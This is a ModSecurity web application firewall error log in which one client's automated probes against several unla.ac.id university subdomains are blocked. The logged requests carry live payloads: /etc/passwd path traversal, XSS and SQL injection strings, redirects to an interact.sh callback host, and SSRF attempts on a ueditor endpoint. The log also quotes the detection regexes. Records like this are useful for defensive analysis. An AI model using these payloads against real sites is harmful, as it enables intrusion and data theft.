[Tue Aug 29 11:56:40.864929 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?(x?or|div|like|between|and)\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]?\\\\d)|(?:\\\\\\\\x(?:23|27|3d))|(?:^.?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]$)|(?:(?:^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\\\\\]*?(?:[\\\\ ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "237"] [id "981242"] [msg "Detects classic SQL injection probings 1/2"] [data "Matched Data: (1)-\\x22x found within ARGS:user: j\\x22;-alert(1)-\\x22x"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/global-protect/login.esp"] [unique_id "ZO16iMCo-f0AAAq-HeYAAAAT"]
[Tue Aug 29 11:56:40.887186 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16iMCo-f0AAAq3bBYAAAAI"]
[Tue Aug 29 11:56:40.914666 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:indexFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:indexFile: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16iMCo-f0AAAq3bBcAAAAI"]
[Tue Aug 29 11:56:40.939242 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:searchdata. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:searchdata: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/search-request.php"] [unique_id "ZO16iMCo-f0AAAoz8MgAAAAS"]
[Tue Aug 29 11:56:41.638957 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:viewit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:viewit: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16icCo-f0AAAoz8M0AAAAS"]
[Tue Aug 29 11:56:41.640237 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16icCo-f0AAAqw54AAAAAH"]
[Tue Aug 29 11:56:42.755140 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAArIAXQAAAAX"]
[Tue Aug 29 11:56:42.856317 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqsV-8AAAAB"]
[Tue Aug 29 11:56:42.964003 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqsWAMAAAAB"]
[Tue Aug 29 11:56:42.966171 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAocymsAAAAR"]
[Tue Aug 29 11:56:42.987123 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16isCo-f0AAAqeFsgAAAAx"]
[Tue Aug 29 11:56:43.528654 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAArHa5wAAAAJ"]
[Tue Aug 29 11:56:43.536125 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16i8Co-f0AAAq5@UUAAAAK"]
[Tue Aug 29 11:56:43.576118 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAqeFssAAAAx"]
[Tue Aug 29 11:56:43.577407 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAolK4cAAAAe"]
[Tue Aug 29 11:56:43.655268 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqeFs0AAAAx"]
[Tue Aug 29 11:56:43.715294 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAocynQAAAAR"]
[Tue Aug 29 11:56:43.717038 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAq-HfUAAAAT"]
[Tue Aug 29 11:56:43.721489 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAAqeFtAAAAAx"]
[Tue Aug 29 11:56:43.732394 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16i8Co-f0AAArB14kAAAAV"]
[Tue Aug 29 11:56:43.742816 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAAolK40AAAAe"]
[Tue Aug 29 11:56:43.744655 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16i8Co-f0AAArIAYMAAAAX"]
[Tue Aug 29 11:56:44.548601 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/osclass/oc-admin/index.php"] [unique_id "ZO16jMCo-f0AAAqw54UAAAAH"]
[Tue Aug 29 11:56:44.559451 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAocyncAAAAR"]
[Tue Aug 29 11:56:44.560425 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArB14sAAAAV"]
[Tue Aug 29 11:56:44.631263 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAAolK5AAAAAe"]
[Tue Aug 29 11:56:44.634792 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAApbUykAAAAh"]
[Tue Aug 29 11:56:44.655275 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/advanced-text-widget/advancedtext.php"] [unique_id "ZO16jMCo-f0AAArIAYYAAAAX"]
[Tue Aug 29 11:56:44.676618 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/redirect-to"] [unique_id "ZO16jMCo-f0AAArIAYcAAAAX"]
[Tue Aug 29 11:56:45.537515 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:707056/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq-HfsAAAAT"]
[Tue Aug 29 11:56:45.546210 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:380660/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAoz8NsAAAAS"]
[Tue Aug 29 11:56:45.571493 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:265536/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAAq-HfwAAAAT"]
[Tue Aug 29 11:56:45.574926 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:source[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://127.0.0.1 found within ARGS:source[]: http://127.0.0.1:053931/?1.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ueditor/php/controller.php"] [unique_id "ZO16jcCo-f0AAArZP0MAAAAC"]
